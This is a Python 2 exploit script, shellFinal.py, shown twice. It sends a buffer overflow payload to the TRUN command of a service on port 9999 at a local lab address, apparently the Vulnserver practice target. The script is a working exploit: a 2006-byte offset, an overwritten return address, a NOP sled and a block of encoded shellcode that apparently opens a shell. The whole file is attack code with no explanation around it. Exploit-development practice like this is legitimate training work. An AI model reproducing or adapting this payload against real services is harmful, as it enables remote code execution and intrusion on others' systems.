whichbuffer/shellFinal.py

## shellFinal.py
#!/usr/bin/python
import socket
server = '192.168.1.33'
sport = 9999

prefix = 'A' * 2006
eip = '\xaf\x11\x50\x62'
nopsled = '\x90' * 16
exploit = (
"\xba\x1f\xa9\x2f\xbb\xda\xcd\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x52\x83\xee\xfc\x31\x56\x0e\x03\x49\xa7\xcd\x4e\x89\x5f\x93"
"\xb1\x71\xa0\xf4\x38\x94\x91\x34\x5e\xdd\x82\x84\x14\xb3\x2e"
"\x6e\x78\x27\xa4\x02\x55\x48\x0d\xa8\x83\x67\x8e\x81\xf0\xe6"
"\x0c\xd8\x24\xc8\x2d\x13\x39\x09\x69\x4e\xb0\x5b\x22\x04\x67"
"\x4b\x47\x50\xb4\xe0\x1b\x74\xbc\x15\xeb\x77\xed\x88\x67\x2e"
"\x2d\x2b\xab\x5a\x64\x33\xa8\x67\x3e\xc8\x1a\x13\xc1\x18\x53"
"\xdc\x6e\x65\x5b\x2f\x6e\xa2\x5c\xd0\x05\xda\x9e\x6d\x1e\x19"
"\xdc\xa9\xab\xb9\x46\x39\x0b\x65\x76\xee\xca\xee\x74\x5b\x98"
"\xa8\x98\x5a\x4d\xc3\xa5\xd7\x70\x03\x2c\xa3\x56\x87\x74\x77"
"\xf6\x9e\xd0\xd6\x07\xc0\xba\x87\xad\x8b\x57\xd3\xdf\xd6\x3f"
"\x10\xd2\xe8\xbf\x3e\x65\x9b\x8d\xe1\xdd\x33\xbe\x6a\xf8\xc4"
"\xc1\x40\xbc\x5a\x3c\x6b\xbd\x73\xfb\x3f\xed\xeb\x2a\x40\x66"
"\xeb\xd3\x95\x29\xbb\x7b\x46\x8a\x6b\x3c\x36\x62\x61\xb3\x69"
"\x92\x8a\x19\x02\x39\x71\xca\xed\x16\x78\x11\x86\x64\x7a\x24"
"\xed\xe0\x9c\x4c\x01\xa5\x37\xf9\xb8\xec\xc3\x98\x45\x3b\xae"
"\x9b\xce\xc8\x4f\x55\x27\xa4\x43\x02\xc7\xf3\x39\x85\xd8\x29"
"\x55\x49\x4a\xb6\xa5\x04\x77\x61\xf2\x41\x49\x78\x96\x7f\xf0"
"\xd2\x84\x7d\x64\x1c\x0c\x5a\x55\xa3\x8d\x2f\xe1\x87\x9d\xe9"
"\xea\x83\xc9\xa5\xbc\x5d\xa7\x03\x17\x2c\x11\xda\xc4\xe6\xf5"
"\x9b\x26\x39\x83\xa3\x62\xcf\x6b\x15\xdb\x96\x94\x9a\x8b\x1e"
"\xed\xc6\x2b\xe0\x24\x43\x4b\x03\xec\xbe\xe4\x9a\x65\x03\x69"
"\x1d\x50\x40\x94\x9e\x50\x39\x63\xbe\x11\x3c\x2f\x78\xca\x4c"
"\x20\xed\xec\xe3\x41\x24"
)
padding = 'F' * (3000 - 2006 - 4 - 16 - len(exploit))
attack = prefix + eip + nopsled + exploit + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
	#!/usr/bin/python
	import socket
	server = '192.168.1.33'
	sport = 9999

	prefix = 'A' * 2006
	eip = '\xaf\x11\x50\x62'
	nopsled = '\x90' * 16
	exploit = (
	"\xba\x1f\xa9\x2f\xbb\xda\xcd\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
	"\x52\x83\xee\xfc\x31\x56\x0e\x03\x49\xa7\xcd\x4e\x89\x5f\x93"
	"\xb1\x71\xa0\xf4\x38\x94\x91\x34\x5e\xdd\x82\x84\x14\xb3\x2e"
	"\x6e\x78\x27\xa4\x02\x55\x48\x0d\xa8\x83\x67\x8e\x81\xf0\xe6"
	"\x0c\xd8\x24\xc8\x2d\x13\x39\x09\x69\x4e\xb0\x5b\x22\x04\x67"
	"\x4b\x47\x50\xb4\xe0\x1b\x74\xbc\x15\xeb\x77\xed\x88\x67\x2e"
	"\x2d\x2b\xab\x5a\x64\x33\xa8\x67\x3e\xc8\x1a\x13\xc1\x18\x53"
	"\xdc\x6e\x65\x5b\x2f\x6e\xa2\x5c\xd0\x05\xda\x9e\x6d\x1e\x19"
	"\xdc\xa9\xab\xb9\x46\x39\x0b\x65\x76\xee\xca\xee\x74\x5b\x98"
	"\xa8\x98\x5a\x4d\xc3\xa5\xd7\x70\x03\x2c\xa3\x56\x87\x74\x77"
	"\xf6\x9e\xd0\xd6\x07\xc0\xba\x87\xad\x8b\x57\xd3\xdf\xd6\x3f"
	"\x10\xd2\xe8\xbf\x3e\x65\x9b\x8d\xe1\xdd\x33\xbe\x6a\xf8\xc4"
	"\xc1\x40\xbc\x5a\x3c\x6b\xbd\x73\xfb\x3f\xed\xeb\x2a\x40\x66"
	"\xeb\xd3\x95\x29\xbb\x7b\x46\x8a\x6b\x3c\x36\x62\x61\xb3\x69"
	"\x92\x8a\x19\x02\x39\x71\xca\xed\x16\x78\x11\x86\x64\x7a\x24"
	"\xed\xe0\x9c\x4c\x01\xa5\x37\xf9\xb8\xec\xc3\x98\x45\x3b\xae"
	"\x9b\xce\xc8\x4f\x55\x27\xa4\x43\x02\xc7\xf3\x39\x85\xd8\x29"
	"\x55\x49\x4a\xb6\xa5\x04\x77\x61\xf2\x41\x49\x78\x96\x7f\xf0"
	"\xd2\x84\x7d\x64\x1c\x0c\x5a\x55\xa3\x8d\x2f\xe1\x87\x9d\xe9"
	"\xea\x83\xc9\xa5\xbc\x5d\xa7\x03\x17\x2c\x11\xda\xc4\xe6\xf5"
	"\x9b\x26\x39\x83\xa3\x62\xcf\x6b\x15\xdb\x96\x94\x9a\x8b\x1e"
	"\xed\xc6\x2b\xe0\x24\x43\x4b\x03\xec\xbe\xe4\x9a\x65\x03\x69"
	"\x1d\x50\x40\x94\x9e\x50\x39\x63\xbe\x11\x3c\x2f\x78\xca\x4c"
	"\x20\xed\xec\xe3\x41\x24"
	)
	padding = 'F' * (3000 - 2006 - 4 - 16 - len(exploit))
	attack = prefix + eip + nopsled + exploit + padding

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect = s.connect((server, sport))
	print s.recv(1024)
	print "Sending attack to TRUN . with length ", len(attack)
	s.send(('TRUN .' + attack + '\r\n'))
	print s.recv(1024)
	s.send('EXIT\r\n')
	print s.recv(1024)
	s.close()